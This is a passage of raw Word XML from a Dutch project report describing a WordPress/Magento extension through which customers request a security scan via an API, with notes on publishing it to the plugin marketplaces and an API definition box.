AAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEATV9ngjkCAAB4BAAADgAAAAAA&#10;AAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEARcDz9eIAAAAKAQAADwAA&#10;AAAAAAAAAAAAAACRBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAKAFAAAAAA==&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="5181D6C3" w14:textId="7ABF78DC" w:rsidR="00CE4BB5" w:rsidRPr="00F04F14" w:rsidRDefault="00CE4BB5" w:rsidP="002C41CF">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 4.6 TODO update diagram</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251857920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="02E5BB39" wp14:editId="3E329F37">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>391160</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>407670</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4369435" cy="1725930"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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gistratie proces.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4369435" cy="1725930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06878B38" w14:textId="090D0AE3" w:rsidR="00003CCA" w:rsidRDefault="00003CCA"/>
    <w:p w14:paraId="276FA081" w14:textId="7F0A5B09" w:rsidR="00645445" w:rsidRDefault="00645445"/>
    <w:p w14:paraId="0269EB7C" w14:textId="1C83A9A9" w:rsidR="002C41CF" w:rsidRDefault="002C41CF"/>
    <w:p w14:paraId="1402A048" w14:textId="53BCC5A0" w:rsidR="00E94989" w:rsidRDefault="00E94989">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B93F19D" w14:textId="65B2B625" w:rsidR="00360CF1" w:rsidRDefault="005F4C37">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Aanvraag proces</w:t>
      </w:r>
      <w:r w:rsidR="009E59A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D09A61" w14:textId="3BF94793" w:rsidR="00A872D2" w:rsidRDefault="00360CF1">
      <w:r>
        <w:t>Na het activeren van de extensie krijgt de klant i.p.v. het registratieformulier een aanvraagformulier te zien.</w:t>
      </w:r>
      <w:r w:rsidR="00997671">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007266D7">
        <w:t>Het proces hiervan gebeurt bij het initialiseren van de extensie, hier wordt gecontroleerd of het om en actieve account</w:t>
      </w:r>
      <w:r w:rsidR="008041FD">
        <w:t xml:space="preserve"> gaat, indien dit zo is dan krijgt de klant he</w:t>
      </w:r>
      <w:r w:rsidR="000F2A41">
        <w:t>t aanvraagformulier geserveerd.</w:t>
      </w:r>
      <w:r w:rsidR="00C63EAF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0059245F">
        <w:t>Hiermee kan de klant een aanvraag doen voor een scan</w:t>
      </w:r>
      <w:r w:rsidR="00796459">
        <w:t xml:space="preserve">. Het aanvraagformulier bestaat uit een aantal velden waaronder het emailveld, naam van </w:t>
      </w:r>
      <w:r w:rsidR="000206FC">
        <w:t xml:space="preserve">aanvrager en de type scan dat uitgevoerd moet worden. </w:t>
      </w:r>
      <w:r w:rsidR="00922F87">
        <w:t xml:space="preserve">De velden email en </w:t>
      </w:r>
      <w:r w:rsidR="00733C17">
        <w:t xml:space="preserve">naam zijn optioneel. Indien deze niet worden ingevuld pakt het systeem de </w:t>
      </w:r>
      <w:r w:rsidR="0017276C">
        <w:t xml:space="preserve">email en naam van het </w:t>
      </w:r>
      <w:r w:rsidR="00F06D29">
        <w:t>CMS-account.</w:t>
      </w:r>
      <w:r w:rsidR="003201F9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00867967">
        <w:t>Bij h</w:t>
      </w:r>
      <w:r w:rsidR="00B8680A">
        <w:t>et aanvragen wordt er een</w:t>
      </w:r>
      <w:r w:rsidR="00867967">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00953B41">
        <w:t>API-call</w:t>
      </w:r>
      <w:r w:rsidR="00867967">
        <w:t xml:space="preserve"> gedaan naar het systeem toe. </w:t>
      </w:r>
      <w:r w:rsidR="008F1461">
        <w:t xml:space="preserve">De </w:t>
      </w:r>
      <w:r w:rsidR="00953B41">
        <w:t>CMS-extensie</w:t>
      </w:r>
      <w:r w:rsidR="008F1461">
        <w:t xml:space="preserve"> gebruikt de API als </w:t>
      </w:r>
      <w:r w:rsidR="006E42F5">
        <w:t>communicatiemiddel</w:t>
      </w:r>
      <w:r w:rsidR="007B0C5A">
        <w:t xml:space="preserve"> om het proces te brengen naar de volgende stap, het scannen van het systeem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB5AC37" w14:textId="69969A2C" w:rsidR="00AE548B" w:rsidRDefault="009D0731" w:rsidP="00A36047">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251860992" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4F0FBB3C" wp14:editId="112716E7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>113030</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>219075</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4648835" cy="282956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anvraagformulier.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4648835" cy="2829560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00E94989">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251863040" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5E5A3E9B" wp14:editId="130E6E41">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>107315</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3075940</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4648835" cy="269875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="58" name="Text Box 58"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4648835" cy="269875"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="1B4D831D" w14:textId="0A2CB6ED" w:rsidR="00CE4BB5" w:rsidRPr="00722C13" w:rsidRDefault="00CE4BB5" w:rsidP="00F33E7A">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figure 4.7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5A3E9B" id="Text Box 58" o:spid="_x0000_s1065" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:8.45pt;margin-top:242.2pt;width:366.05pt;height:21.2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2qLTkCAAB4BAAADgAAAGRycy9lMm9Eb2MueG1srFRRb9owEH6ftP9g+X0EaGEsIlSMimlS1VaC&#10;qc/GcYgl2+fZhoT9+p2dhG7dnqa9mPPd+bvc992xvGu1ImfhvART0MloTIkwHEppjgX9tt9+WFDi&#10;AzMlU2BEQS/C07vV+3fLxuZiCjWoUjiCIMbnjS1oHYLNs8zzWmjmR2CFwWAFTrOAV3fMSscaRNcq&#10;m47H86wBV1oHXHiP3vsuSFcJv6oED09V5UUgqqD4bSGdLp2HeGarJcuPjtla8v4z2D98hWbSYNEr&#10;1D0LjJyc/ANKS+7AQxVGHHQGVSW5SD1gN5Pxm252NbMi9YLkeHulyf8/WP54fnZElgWdoVKGadRo&#10;L9pAPkNL0IX8NNbnmLazmBha9KPOg9+jM7bdVk7HX2yIYByZvlzZjWgcnbfz28XiZkYJx9h0/mnx&#10;cRZhstfX1vnwRYAm0SioQ/USqez84EOXOqTEYh6ULLdSqXiJgY1y5MxQ6aaWQfTgv2UpE3MNxFcd&#10;YOcRaVT6KrHhrrFohfbQJoJupkPXBygvSIaDbpy85VuJ5R+YD8/M4fxg/7gT4QmPSkFTUOgtSmpw&#10;P/7mj/koK0YpaXAeC+q/n5gTlKivBgWPwzsYbjAOg2FOegPY+AS3zfJk4gMX1GBWDvQLrso6VsEQ&#10;MxxrFTQM5iZ0W4GrxsV6nZJwRC0LD2ZneYQeaN63L8zZXqSA8j7CMKksf6NVl5vUsutTQOKTkJHY&#10;jkUcgHjB8U6j0K9i3J9f7ynr9Q9j9RMAAP//AwBQSwMEFAAGAAgAAAAhALwCNmjgAAAACgEAAA8A&#10;AABkcnMvZG93bnJldi54bWxMjzFPwzAUhHck/oP1kFgQdSgmtCFOVVUw0KUidGFzYzcOxM+R7bTh&#10;3/OYYDzd6e67cjW5np1MiJ1HCXezDJjBxusOWwn795fbBbCYFGrVezQSvk2EVXV5UapC+zO+mVOd&#10;WkYlGAslwaY0FJzHxhqn4swPBsk7+uBUIhlaroM6U7nr+TzLcu5Uh7Rg1WA21jRf9egk7MTHzt6M&#10;x+ftWtyH1/24yT/bWsrrq2n9BCyZKf2F4Ref0KEipoMfUUfWk86XlJQgFkIAo8CjWNK5g4SHOVm8&#10;Kvn/C9UPAAAA//8DAFBLAQItABQABgAIAAAAIQDkmcPA+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAA&#10;AABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhACOyauHXAAAAlAEAAAsAAAAAAAAA&#10;AAAAAAAALAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAMydqi05AgAAeAQAAA4AAAAAAAAA&#10;AAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhALwCNmjgAAAACgEAAA8AAAAA&#10;AAAAAAAAAAAAkQQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAACeBQAAAAA=&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="1B4D831D" w14:textId="0A2CB6ED" w:rsidR="00CE4BB5" w:rsidRPr="00722C13" w:rsidRDefault="00CE4BB5" w:rsidP="00F33E7A">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 4.7</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="218BEFD3" w14:textId="06498DA3" w:rsidR="00AE548B" w:rsidRDefault="00AE548B" w:rsidP="00A36047"/>
    <w:p w14:paraId="4ECB5857" w14:textId="6A08EF4C" w:rsidR="00AE548B" w:rsidRDefault="00AE548B" w:rsidP="00A36047"/>
    <w:p w14:paraId="73D133D0" w14:textId="759F054A" w:rsidR="00A36047" w:rsidRDefault="00A36047" w:rsidP="00A36047">
      <w:r>
        <w:t>Marktplaats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC17946" w14:textId="04BD3804" w:rsidR="009276BC" w:rsidRPr="00E94989" w:rsidRDefault="00A36047">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WordPress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> maken het beide mogelijk om zelf extensies te bouwen, deze worden als modules toegevoegd aan hen respectievelijke </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CMS’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Zowel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hebben hiervoor een marktplaats speciaal voor extensies tot beschikking gesteld. De marktplaats van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Magento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is Marketplace en voor </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Plugins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Hierop kunnen gebruikers extensies downloaden die extra functionaliteiten bieden voor de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CMS’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Ik zal de twee extensies op deze marktplaatsen beschikbaar maken zodat de klanten deze hierop kun</w:t>
      </w:r>
      <w:r w:rsidR="00E94989">
        <w:t>nen afhalen.</w:t>
      </w:r>
      <w:r w:rsidR="009276BC">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C8139D" w14:textId="5AE4A6C7" w:rsidR="009276BC" w:rsidRPr="002B247D" w:rsidRDefault="009276BC" w:rsidP="009276BC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc491022081"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.3 API</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="3490763F" w14:textId="13E8C7AC" w:rsidR="00E83333" w:rsidRDefault="00E83333" w:rsidP="009276BC">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251865088" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6440D97D" wp14:editId="35E95244">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>-310515</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>332740</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6515735" cy="1297940"/>
                <wp:effectExtent l="0" t="0" r="37465" b="22860"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="59" name="Text Box 32"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6515735" cy="129794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5E03BC6" w14:textId="4BC11BF6" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00E83333">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                                <w:b/>
                                <w:noProof/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:drawing>
                                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2234FD17" wp14:editId="65DE156C">
                                  <wp:extent cx="266700" cy="266700"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                  <wp:docPr id="518"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API</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="070218C2" w14:textId="109E911D" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00E83333">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                              </w:rPr>
                              <w:t>Application Programming Interface</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4A5A98A3" w14:textId="6F75BBB4" w:rsidR="00CE4BB5" w:rsidRPr="00A93B54" w:rsidRDefault="00CE4BB5" w:rsidP="00E83333">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Een Application Programming Interface (API) is een verzameling van definities waarmee twee softwareapplicaties met elkaar kunnen communiceren.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0D97D" id="_x0000_s1066" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-24.45pt;margin-top:26.2pt;width:513.05pt;height:102.2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341qKMCAADYBQAADgAAAGRycy9lMm9Eb2MueG1srFTfT9swEH6ftP/B8vuapqWwVqSoK2KaxAAN&#10;Jp5dx26j2T7PdpuUv35nJykdQ5qY9pLYd9/9+nx35xeNVmQnnK/AFDQfDCkRhkNZmXVBvz9cffhI&#10;iQ/MlEyBEQXdC08v5u/fndd2JkawAVUKR9CJ8bPaFnQTgp1lmecboZkfgBUGlRKcZgGvbp2VjtXo&#10;XatsNByeZjW40jrgwnuUXrZKOk/+pRQ83ErpRSCqoJhbSF+Xvqv4zebnbLZ2zG4q3qXB/iELzSqD&#10;QQ+uLllgZOuqP1zpijvwIMOAg85AyoqLVANWkw9fVHO/YVakWpAcbw80+f/nlt/s7hypyoJOppQY&#10;pvGNHkQTyCdoyHgU+amtnyHs3iIwNCjHd+7lHoWx7EY6Hf9YEEE9Mr0/sBu9cRSeTvLJ2XhCCUdd&#10;PpqeTU8S/9mzuXU+fBagSTwU1OHzJVbZ7toHTAWhPSRG86Cq8qpSKl1iy4ilcmTH8LFX6zyZqq3+&#10;CmUrm06Gwz5k6rAIT15/86TM35yHJjGA6RwZ4q21FKnvuowjey1L6RT2SkTvynwTEnlPZL2SPuNc&#10;mNBHSeiIkljsWww7fDRts3qL8cEiRQYTDsa6MuASvQcaW4bLH33KssUju0d1x2NoVk1quPG476IV&#10;lHtsLgfteHrLrypsgGvmwx1zOI/YT7hjwi1+pIK6oNCdKNmAe3pNHvE4JqilpMb5Lqj/uWVOUKK+&#10;GBygaX6C7UdCupxMzkZ4ccea1bHGbPUSsKty3GaWp2PEB9UfpQP9iKtoEaOiihmOsQsa+uMytFsH&#10;VxkXi0UC4QqwLFybe8uj60hzbO+H5pE5281AwPG5gX4TsNmLUWix0dLAYhtAVmlOItEtq90D4PpI&#10;jd6turifju8J9byQ578AAAD//wMAUEsDBBQABgAIAAAAIQDqPCsi4AAAAAoBAAAPAAAAZHJzL2Rv&#10;d25yZXYueG1sTI/LTsMwEEX3SPyDNUhsUOsQ9ZGmmVRQiSULCkIs3XiaRMTjYDtp+veYFV2O7tG9&#10;Z4rdZDoxkvOtZYTHeQKCuLK65Rrh4/1lloHwQbFWnWVCuJCHXXl7U6hc2zO/0XgItYgl7HOF0ITQ&#10;51L6qiGj/Nz2xDE7WWdUiKerpXbqHMtNJ9MkWUmjWo4Ljepp31D1fRgMgv5000XvK/M1Vj/98Pww&#10;vrpEIt7fTU9bEIGm8A/Dn35UhzI6He3A2osOYbbINhFFWKYLEBHYrNcpiCNCulxlIMtCXr9Q/gIA&#10;AP//AwBQSwECLQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRl&#10;bnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQBAAALAAAAAAAAAAAAAAAAACwB&#10;AABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQB/fjWoowIAANgFAAAOAAAAAAAAAAAAAAAAACwC&#10;AABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQDqPCsi4AAAAAoBAAAPAAAAAAAAAAAAAAAA&#10;APsEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAACAYAAAAA&#10;" fillcolor="#f2f2f2 [3052]" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="55E03BC6" w14:textId="4BC11BF6" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00E83333">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                          <w:b/>
                          <w:noProof/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:drawing>
                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2234FD17" wp14:editId="65DE156C">
                            <wp:extent cx="266700" cy="266700"/>
                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
                            <wp:docPr id="518"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API</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="070218C2" w14:textId="109E911D" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00E83333">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                        </w:rPr>
                        <w:t>Application Programming Interface</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4A5A98A3" w14:textId="6F75BBB4" w:rsidR="00CE4BB5" w:rsidRPr="00A93B54" w:rsidRDefault="00CE4BB5" w:rsidP="00E83333">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Een Application Programming Interface (API) is een verzameling van definities waarmee twee softwareapplicaties met elkaar kunnen communiceren.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AED770" w14:textId="6B8B29C1" w:rsidR="00D250DA" w:rsidRDefault="00FB7A00" w:rsidP="009276BC">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252007424" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7E69ADE9" wp14:editId="42475ED0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-327660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1522095</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5652135" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="37465" b="38100"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="247" name="Text Box 247"/>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BD940F9" w14:textId="252DC9B5" w:rsidR="00CE4BB5" w:rsidRPr="00AA65F4" w:rsidRDefault="00CE4BB5" w:rsidP="00FB7A00">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Business </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Doel</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t xml:space="preserve">: </w:t>
                            </w:r>
                            <w:r>
